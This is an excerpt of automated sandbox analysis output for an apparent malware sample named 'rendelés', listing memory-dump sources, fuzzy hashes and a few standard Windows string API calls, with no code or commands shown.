                                                                • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                                • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                                • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $]q$$]q$$]q$$]q
                                                                • API String ID: 0-858218434
                                                                • Opcode ID: c571f9e88bfe55dff97ca05c60c6c243acd49f31ac45e7d2497d2ade8f6a6a76
                                                                • Instruction ID: a60f6987ed506465628315092470cbdff56d76175170d14a12faa59e0e3c5d1b
                                                                • Opcode Fuzzy Hash: c571f9e88bfe55dff97ca05c60c6c243acd49f31ac45e7d2497d2ade8f6a6a76
                                                                • Instruction Fuzzy Hash: 02519D34A102048FDB15DE68D680A9EB7F3FB85350F1485AAD806BF355DB35D886CB80
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR]q$LR]q$$]q$$]q
                                                                • API String ID: 0-3527005858
                                                                • Opcode ID: d86cb78c8114dbb123aa83acb5974a0302b72787fff344f092c33dc4c455f985
                                                                • Instruction ID: ceaf152d8fef714e6ee0e7fcf73093956e59ea0210a268cb39baac4cf96b4500
                                                                • Opcode Fuzzy Hash: d86cb78c8114dbb123aa83acb5974a0302b72787fff344f092c33dc4c455f985
                                                                • Instruction Fuzzy Hash: DA518D307102019FDB18EF68C991A5AB7F6FF89704B1085A9E4069F3A6DB75EC46CB90
                                                                APIs
                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060E5
                                                                • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                                • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                • String ID:
                                                                • API String ID: 190613189-0
                                                                • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                                • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798